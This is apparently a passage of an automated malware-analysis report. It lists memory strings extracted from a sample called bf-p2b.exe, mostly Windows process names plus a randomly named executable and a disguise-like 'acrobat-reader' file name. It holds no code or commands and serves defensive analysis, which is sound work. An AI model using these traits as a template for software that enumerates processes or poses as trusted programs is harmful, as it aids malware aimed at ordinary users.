                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hh!svchost.exe(memstr_d58d7f65-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x"svchost.exe8memstr_6e2856b4-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #memory compressionhmemstr_c4915553-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $svchost.exememstr_7d5aa962-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %svchost.exehmemstr_73294557-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &svchost.exememstr_c784906e-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'svchost.exehmemstr_78694576-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )svchost.exememstr_538c98ce-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *svchost.exe(memstr_eddde137-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +svchost.exehmemstr_353ef393-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,svchost.exememstr_71143001-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .svchost.exememstr_b472471b-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `4x+`memstr_6f68cf50-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /svchost.exememstr_4a9ca715-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <(p6(memstr_fc4262f4-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0svchost.exememstr_88699a14-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1svchost.exememstr_acac839c-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2spoolsv.exe(memstr_69f5ef59-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3svchost.exememstr_46525a36-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4svchost.exe(memstr_19bbb1e3-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5svchost.exe(memstr_9d4742a8-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6svchost.exememstr_20388182-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "txmemstr_30c80273-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7svchost.exememstr_a749e92b-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "\`memstr_689e1f6e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &\tmemstr_f5e3a1fc-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8svchost.exe(memstr_0b2ad122-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: d~xzbmemstr_5443d8bb-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: :svchost.exememstr_cd38e359-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <svchost.exememstr_f2f20578-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %pcnzmemstr_41c313a7-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #=officeclicktorun.exe(memstr_f53ee73a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: >svchost.exehmemstr_ee9ea5b0-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ?svchost.exehmemstr_284f471a-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @svchost.exe(memstr_780c995d-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: asvchost.exememstr_84d0c5e3-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csvchost.exememstr_360c7459-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dsvchost.exe(memstr_051c979b-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: esvchost.exememstr_c7cc92b8-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fsvchost.exememstr_43362cbd-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k0\0]0\.memstr_36158def-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )gsihost.exe(memstr_fbbc4941-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hsvchost.exememstr_b46bf800-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: y0p t0pxmemstr_dc3416e7-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: isvchost.exememstr_a8d01642-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: jsvchost.exehmemstr_9a2e05b0-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: psvchost.exememstr_2cddc173-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hb > ;@= ;)memstr_44c7dfa8-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qsvchost.exememstr_6c8a1f8b-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3rctfmon.exehmemstr_67efd83a-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ssvchost.exepmemstr_9675d552-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s4p89memstr_c61525ca-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: uexplorer.exememstr_441ce51e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vsvchost.exehmemstr_fa858e45-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wdashost.exehmemstr_cd6d5f43-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2`1@2memstr_76f0a1e9-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ysvchost.exememstr_c03c47c3-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [startmenuexperiencehost.exememstr_3c5fa956-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \runtimebroker.exememstr_1cf37b86-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ]searchapp.exe8memstr_825e5e21-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ^runtimebroker.exememstr_e5d7612b-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: _svchost.exe(memstr_29de4bcd-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `svchost.exe(memstr_6ef7677a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fdllhost.exepmemstr_430533a5-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )gsmartscreen.exememstr_0d21bd86-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: jsvchost.exememstr_71e2d415-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nwmiprvse.exexmemstr_dff3ca52-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ah]pmemstr_163b668d-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: textinputhost.exememstr_980dba5d-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: audiodg.exememstr_67afb325-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: t"(xymemstr_96cdc493-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exememstr_b41b1a7d-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exehmemstr_ebe3343d-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: mousocoreworker.exememstr_0a713054-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: applicationframehost.exememstr_8f526032-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: winstore.app.exexmemstr_cd0390af-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: systemsettings.exememstr_73f768a5-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: useroobebroker.exepmemstr_3a1912cd-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 580 # q #memstr_297ead67-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wmiprvse.exepmemstr_31fb256e-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #h!`h`h`hmemstr_85dbad53-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sgrmbroker.exehmemstr_21fb4e68-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0$0$0$gmemstr_6294a25c-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8:8:`-`-`-memstr_8536f043-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dllhost.exememstr_4311eb96-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: joooymemstr_96792948-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cscript.exememstr_ae33cbe7-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x x @d@d@d$dmemstr_25a6f7e2-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: conhost.exememstr_e9dbdfde-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wmiprvse.exememstr_36e9f09e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %u]$memstr_66eeb814-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: backgroundtaskhost.exexmemstr_1984bd1b-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .p,p,p,memstr_c417f33a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgbw0memstr_681cb9a1-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exexmemstr_3e4afc7a-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exe(memstr_df556b2b-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: upfc.exememstr_7459b429-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: h%h%
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exe
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: pg`g8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: `gpg8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @g0g8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: pg@g8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 0g g8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exeh
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 9]?l;
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dllhost.exe(
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bf-p2b.exe
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wscript.exe
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: softwarefx-acrobat-reader.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: system
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: registry(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: smss.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csrss.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wininit.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #q^}1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csrss.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winlogon.exe`
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: z3zby
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: services.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: npqpqpqz,k
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lsass.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fontdrvhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fontdrvhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lp\p\p\
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,p#p&p#f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwm.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p, )p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pi.e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exe8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @[`px
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hh!svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x"svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )2#memory compression
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 'svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `4x+`
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <(p6(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2spoolsv.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4svchost.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tx
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \`
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &\t
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d~xzb
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %pcnz
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #=officeclicktorun.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: asvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csvchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dsvchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: esvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fsvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: k0\0]0\.
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )gsihost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hsvchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: y0p t0px
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: isvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jsvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: psvchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hb > ;@= ;)
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qsvchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3rctfmon.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssvchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uexplorer.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsvchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wdashost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2`1@2
